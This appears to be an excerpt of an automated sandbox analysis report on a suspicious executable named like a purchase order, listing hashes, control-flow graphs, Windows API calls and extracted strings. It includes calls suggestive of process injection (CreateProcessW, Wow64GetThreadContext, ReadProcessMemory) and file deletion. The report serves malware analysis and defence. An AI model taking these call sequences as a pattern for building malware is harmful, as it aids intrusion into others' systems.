                          • Instruction ID: e64edf78a401ceb40fc2d6b224347eca41cf0e386cfebe991ac41d3ab57ffe9e
                          • Opcode Fuzzy Hash: 6ac1b84d5eabc4840b4287655157428a80ce0ba9ccc9356d506e81ac9075058f
                          • Instruction Fuzzy Hash: 9071DF715053059FC704EF69EC8286BBBE8FFA4350F40042EF545831A1EB789A48FBA2

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00F02B8E
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00F02B9D
                          • LoadIconW.USER32(00000063), ref: 00F02BB3
                          • LoadIconW.USER32(000000A4), ref: 00F02BC5
                          • LoadIconW.USER32(000000A2), ref: 00F02BD7
                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F02BEF
                          • RegisterClassExW.USER32(?), ref: 00F02C40
                            • Part of subcall function 00F02CD4: GetSysColorBrush.USER32(0000000F), ref: 00F02D07
                            • Part of subcall function 00F02CD4: RegisterClassExW.USER32(00000030), ref: 00F02D31
                            • Part of subcall function 00F02CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F02D42
                            • Part of subcall function 00F02CD4: InitCommonControlsEx.COMCTL32(?), ref: 00F02D5F
                            • Part of subcall function 00F02CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F02D6F
                            • Part of subcall function 00F02CD4: LoadIconW.USER32(000000A9), ref: 00F02D85
                            • Part of subcall function 00F02CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F02D94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                          • String ID: #$0$AutoIt v3
                          • API String ID: 423443420-4155596026
                          • Opcode ID: 531de2260d298b97d03d09b9655cc62b0496f3007b0f266b13fb608e0d689b46
                          • Instruction ID: 55eb66441efa3d2afad020ac60accecbe356bb65be7ba3169acdf684958a18bf
                          • Opcode Fuzzy Hash: 531de2260d298b97d03d09b9655cc62b0496f3007b0f266b13fb608e0d689b46
                          • Instruction Fuzzy Hash: DB212C70E0231CBBDB119FE5EC55A9E7FB6FB48B50F44411BE504A66A0D7B20540EF90

                          Control-flow Graph

                          control_flow_graph 443 f03170-f03185 444 f031e5-f031e7 443->444 445 f03187-f0318a 443->445 444->445 446 f031e9 444->446 447 f031eb 445->447 448 f0318c-f03193 445->448 449 f031d0-f031d8 DefWindowProcW 446->449 450 f031f1-f031f6 447->450 451 f42dfb-f42e23 call f018e2 call f1e499 447->451 452 f03265-f0326d PostQuitMessage 448->452 453 f03199-f0319e 448->453 454 f031de-f031e4 449->454 456 f031f8-f031fb 450->456 457 f0321d-f03244 SetTimer RegisterWindowMessageW 450->457 486 f42e28-f42e2f 451->486 455 f03219-f0321b 452->455 459 f031a4-f031a8 453->459 460 f42e7c-f42e90 call f6bf30 453->460 455->454 465 f03201-f03214 KillTimer call f030f2 call f03c50 456->465 466 f42d9c-f42d9f 456->466 457->455 461 f03246-f03251 CreatePopupMenu 457->461 462 f42e68-f42e77 call f6c161 459->462 463 f031ae-f031b3 459->463 460->455 479 f42e96 460->479 461->455 462->455 469 f42e4d-f42e54 463->469 470 f031b9-f031be 463->470 465->455 472 f42dd7-f42df6 MoveWindow 466->472 473 f42da1-f42da5 466->473 469->449 482 f42e5a-f42e63 call f60ad7 469->482 477 f03253-f03263 call f0326f 470->477 478 f031c4-f031ca 470->478 472->455 480 f42dc6-f42dd2 SetFocus 473->480 481 f42da7-f42daa 473->481 477->455 478->449 478->486 479->449 480->455 481->478 487 f42db0-f42dc1 call f018e2 481->487 482->449 486->449 491 f42e35-f42e48 call f030f2 call f03837 486->491 487->455 491->449
                          APIs
                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F0316A,?,?), ref: 00F031D8
                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00F0316A,?,?), ref: 00F03204
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F03227
                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F0316A,?,?), ref: 00F03232
                          • CreatePopupMenu.USER32 ref: 00F03246
                          • PostQuitMessage.USER32(00000000), ref: 00F03267
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                          • String ID: TaskbarCreated
                          • API String ID: 129472671-2362178303
                          • Opcode ID: 66bdcd14adc542109e95117bfad750737e9fca5c94967750d625b2a3a216e443
                          • Instruction ID: e43b237c45034c1d19e0fb86f2ad4b1d9b0df0499c67c20c0dbef494e3a0b844
                          • Opcode Fuzzy Hash: 66bdcd14adc542109e95117bfad750737e9fca5c94967750d625b2a3a216e443
                          • Instruction Fuzzy Hash: 9A411C36A44208BBDB145BB8DD2DB793B5EFB09350F080127F901C62E1CB759E40B7A2

                          Control-flow Graph

                          control_flow_graph 499 f38d45-f38d55 500 f38d57-f38d6a call f2f2c6 call f2f2d9 499->500 501 f38d6f-f38d71 499->501 518 f390f1 500->518 503 f38d77-f38d7d 501->503 504 f390d9-f390e6 call f2f2c6 call f2f2d9 501->504 503->504 507 f38d83-f38dae 503->507 523 f390ec call f327ec 504->523 507->504 508 f38db4-f38dbd 507->508 511 f38dd7-f38dd9 508->511 512 f38dbf-f38dd2 call f2f2c6 call f2f2d9 508->512 516 f390d5-f390d7 511->516 517 f38ddf-f38de3 511->517 512->523 520 f390f4-f390f9 516->520 517->516 522 f38de9-f38ded 517->522 518->520 522->512 526 f38def-f38e06 522->526 523->518 528 f38e23-f38e2c 526->528 529 f38e08-f38e0b 526->529 532 f38e4a-f38e54 528->532 533 f38e2e-f38e45 call f2f2c6 call f2f2d9 call f327ec 528->533 530 f38e15-f38e1e 529->530 531 f38e0d-f38e13 529->531 536 f38ebf-f38ed9 530->536 531->530 531->533 534 f38e56-f38e58 532->534 535 f38e5b-f38e79 call f33820 call f329c8 * 2 532->535 562 f3900c 533->562 534->535 572 f38e96-f38ebc call f39424 535->572 573 f38e7b-f38e91 call f2f2d9 call f2f2c6 535->573 539 f38edf-f38eef 536->539 540 f38fad-f38fb6 call f3f89b 536->540 539->540 544 f38ef5-f38ef7 539->544 551 f39029 540->551 552 f38fb8-f38fca 540->552 544->540 548 f38efd-f38f23 544->548 548->540 553 f38f29-f38f3c 548->553 555 f3902d-f39045 ReadFile 551->555 552->551 557 f38fcc-f38fdb GetConsoleMode 552->557 553->540 558 f38f3e-f38f40 553->558 560 f390a1-f390ac GetLastError 555->560 561 f39047-f3904d 555->561 557->551 563 f38fdd-f38fe1 557->563 558->540 564 f38f42-f38f6d 558->564 566 f390c5-f390c8 560->566 567 f390ae-f390c0 call f2f2d9 call f2f2c6 560->567 561->560 568 f3904f 561->568 570 f3900f-f39019 call f329c8 562->570 563->555 569 f38fe3-f38ffd ReadConsoleW 563->569 564->540 571 f38f6f-f38f82 564->571 579 f39005-f3900b call f2f2a3 566->579 580 f390ce-f390d0 566->580 567->562 575 f39052-f39064 568->575 577 f38fff GetLastError 569->577 578 f3901e-f39027 569->578 570->520 571->540 582 f38f84-f38f86 571->582 572->536 573->562 575->570 586 
f39066-f3906a 575->586 577->579 578->575 579->562 580->570 582->540 590 f38f88-f38fa8 582->590 593 f39083-f3908e 586->593 594 f3906c-f3907c call f38a61 586->594 590->540 599 f39090 call f38bb1 593->599 600 f3909a-f3909f call f388a1 593->600 605 f3907f-f39081 594->605 606 f39095-f39098 599->606 600->606 605->570 606->605
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 098c528b876ffa00811b73d109171090ca09da10eb19f9bfc5333ad29fd840f4
                          • Instruction ID: b39a50224265ac111ad78ce4a56dabeebd3d220ef7259d1873a98212c9caedb2
                          • Opcode Fuzzy Hash: 098c528b876ffa00811b73d109171090ca09da10eb19f9bfc5333ad29fd840f4
                          • Instruction Fuzzy Hash: E6C1D1B5D08349AFCB159FB8DC41BADBBB0AF49330F144099F415A7392C7B98942EB60

                          Control-flow Graph
                          APIs
                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EB26E1
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EB2907
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFileFreeVirtual
                          • String ID:
                          • API String ID: 204039940-0
                          • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                          • Instruction ID: c6d006b83ef9a6ff620097fb6419855287878e9c22748addfe581bd11885a316
                          • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                          • Instruction Fuzzy Hash: 2AA10674E00209EBDB18DFA4C995BEEBBB5FF48304F209159E601BB280D7759A41DF94

                          Control-flow Graph
                          control_flow_graph 671 f02c63-f02cd3 CreateWindowExW * 2 ShowWindow * 2
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F02C91
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F02CB2
                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F01CAD,?), ref: 00F02CC6
                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F01CAD,?), ref: 00F02CCF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 6be40b395a26b7c73bfdce55bfb7bc29a493d89cb35d397e668c77c721dff697
                          • Instruction ID: f85926ad36406cada4825cd9d32afc777fcc3fb15a8603ae5611cb84945b49fa
                          • Opcode Fuzzy Hash: 6be40b395a26b7c73bfdce55bfb7bc29a493d89cb35d397e668c77c721dff697
                          • Instruction Fuzzy Hash: E0F0DA756412987BEB311727AC08E773FBEE7C6F50B00005BF904A35A0C6621850FAB1

                          Control-flow Graph
                          APIs
                            • Part of subcall function 00EB22A0: Sleep.KERNELBASE(000001F4), ref: 00EB22B1
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EB24FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFileSleep
                          • String ID: LE0ZO3RNCFU1UFOJEXEV7QI
                          • API String ID: 2694422964-1889324611
                          • Opcode ID: fea47391bfe347af9bdf874a602f6abf269d660ca4c97fb712e094dac6c622be
                          • Instruction ID: f93a0623caaa044b00639d13541ad2b8e357b02d2c689a311f78c080b0638520
                          • Opcode Fuzzy Hash: fea47391bfe347af9bdf874a602f6abf269d660ca4c97fb712e094dac6c622be
                          • Instruction Fuzzy Hash: 8F618070D14288DBEF11DBA4C854BEFBBB5AF19304F145199E208BB2C1D6BA1B44CB66

                          Control-flow Graph

                          APIs
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F72C05
                          • DeleteFileW.KERNEL32(?), ref: 00F72C87
                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F72C9D
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F72CAE
                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F72CC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: File$Delete$Copy
                          • String ID:
                          • API String ID: 3226157194-0
                          • Opcode ID: 345def3206abf8dfe5825146a9cb726757b1a7eba941262d6cdef6ce0535c487
                          • Instruction ID: c62893d6567ea419d96039497b57b04cef74fda70608f56e0c48912edb9ec576
                          • Opcode Fuzzy Hash: 345def3206abf8dfe5825146a9cb726757b1a7eba941262d6cdef6ce0535c487
                          • Instruction Fuzzy Hash: B1B16072E0012DABDF21DFA4CC85EDEB77DEF48350F1080A6F509E6141EA749A44AF61

                          Control-flow Graph
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F03B0F,SwapMouseButtons,00000004,?), ref: 00F03B40
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F03B0F,SwapMouseButtons,00000004,?), ref: 00F03B61
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00F03B0F,SwapMouseButtons,00000004,?), ref: 00F03B83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: 7c70925bc8f4069e433762f3c6f68888d6b3502caa8d75d2647354844f5d427a
                          • Instruction ID: 5a022d55537b29eec4c61317af85d6e6ce9b800aea8aa859e47b01abb6b112f9
                          • Opcode Fuzzy Hash: 7c70925bc8f4069e433762f3c6f68888d6b3502caa8d75d2647354844f5d427a
                          • Instruction Fuzzy Hash: CD112AB5510208FFDB208FA5DC85AAEBBBCEF44758B10445AA805D7160D2319E44B7A0
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00EB1A5B
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EB1AF1
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EB1B13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                          • Instruction ID: c238b558a4959b1f4fed8a487876181759d2dec54da564aa7b220918cae7e2bb
                          • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                          • Instruction Fuzzy Hash: 12620930A14258DBEB24CFA4C851BDEB372EF58304F5091A9E10DFB294E7799E81CB59
                          Strings
                          • Variable must be of type 'Object'., xrefs: 00F532B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: Variable must be of type 'Object'.
                          • API String ID: 0-109567571
                          • Opcode ID: 2ec5552af5a8b05ea0ff401c452fc63d2656169052bbe10aeaab2da25589ed5c
                          • Instruction ID: 0571da5c015bc78475eea03a88c987b6947256bbb039b0c068035394fdfac95e
                          • Opcode Fuzzy Hash: 2ec5552af5a8b05ea0ff401c452fc63d2656169052bbe10aeaab2da25589ed5c
                          • Instruction Fuzzy Hash: CDC27975E00209CFCB24CF68D880AADBBB1BF18310F248969E955AB391D375ED45FB91
                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F433A2
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F03A04
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_wcslen
                          • String ID: Line:
                          • API String ID: 2289894680-1585850449
                          • Opcode ID: 9cd8bbd969e409bd25397cda8103ad0dbd6bbe7175676df59132589f93ffd2fe
                          • Instruction ID: 8a46cb66fff2e50cc16bcc75347b498cd94cd8f3490ff35492e758a50d8c19a8
                          • Opcode Fuzzy Hash: 9cd8bbd969e409bd25397cda8103ad0dbd6bbe7175676df59132589f93ffd2fe
                          • Instruction Fuzzy Hash: 3B31C171909304ABD725EB24DC46BEBB7DDAF40720F00492BF599821D1EB789A49F7C2
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00F20668
                            • Part of subcall function 00F232A4: RaiseException.KERNEL32(?,?,?,00F2068A,?,00FD1444,?,?,?,?,?,?,00F2068A,00F01129,00FC8738,00F01129), ref: 00F23304
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00F20685
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          • Opcode ID: bf5d2d0f08d1fb18ad9b0aed0c4d4916fde562e94d8ccd81f677cc2dac764ad5
                          • Instruction ID: c72fcfde132fc30b23875bd30227ec1ace3a84749ee0889933b760b6a9a2ae62
                          • Opcode Fuzzy Hash: bf5d2d0f08d1fb18ad9b0aed0c4d4916fde562e94d8ccd81f677cc2dac764ad5
                          • Instruction Fuzzy Hash: 95F0C23690021DB7CB00B6A4FC46DAE7B6C5E40360B604535B814D65D3EF79EA6AF9C1
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F7302F
                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F73044
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: 777a542cf0bef42d73bc9ab213e96b16a14291f21f797d13c01eaa29c27141b5
                          • Instruction ID: edfdf3764d853fdc272577c19f15a9656c4397f8f258bae87482f2d7a5df2267
                          • Opcode Fuzzy Hash: 777a542cf0bef42d73bc9ab213e96b16a14291f21f797d13c01eaa29c27141b5
                          • Instruction Fuzzy Hash: C5D05E7250032877DA20A7A4AC0EFCB3A6CDB44750F0002A2B655E2091DAB4D984CAE0
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F882F5
                          • TerminateProcess.KERNEL32(00000000), ref: 00F882FC
                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00F884DD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$CurrentFreeLibraryTerminate
                          • String ID:
                          • API String ID: 146820519-0
                          • Opcode ID: 49948748aa6ffd7e6bd7c1ec54323e0dbb3548329c7ea92b618169fa0df8b448
                          • Instruction ID: 73e27506bd70020a06a8b18d84217fc7202070b135eb22113a13d9cdcf2b993d
                          • Opcode Fuzzy Hash: 49948748aa6ffd7e6bd7c1ec54323e0dbb3548329c7ea92b618169fa0df8b448
                          • Instruction Fuzzy Hash: A4127D71A083019FC714DF28C484B6ABBE1FF84364F54895DE8898B392DB35ED46DB92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea5270d955f5e6bfb0be4931106d1dd0dd60eae2d45df50918b06b65d2032ccd
                          • Instruction ID: 80bf0b9e553a5c2f9c3c61519c43024a4bc222a4248735f92fb6656176a223b7
                          • Opcode Fuzzy Hash: ea5270d955f5e6bfb0be4931106d1dd0dd60eae2d45df50918b06b65d2032ccd
                          • Instruction Fuzzy Hash: 7851CE72D00619DBCB219FB4DC45FAEBBB8EF86B34F14005AF405AB291D7399901BB61
                          APIs
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F01BF4
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F01BFC
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F01C07
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F01C12
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F01C1A
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F01C22
                            • Part of subcall function 00F01B4A: RegisterWindowMessageW.USER32(00000004,?,00F012C4), ref: 00F01BA2
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F0136A
                          • OleInitialize.OLE32 ref: 00F01388
                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00F424AB
                          Memory Dump Source
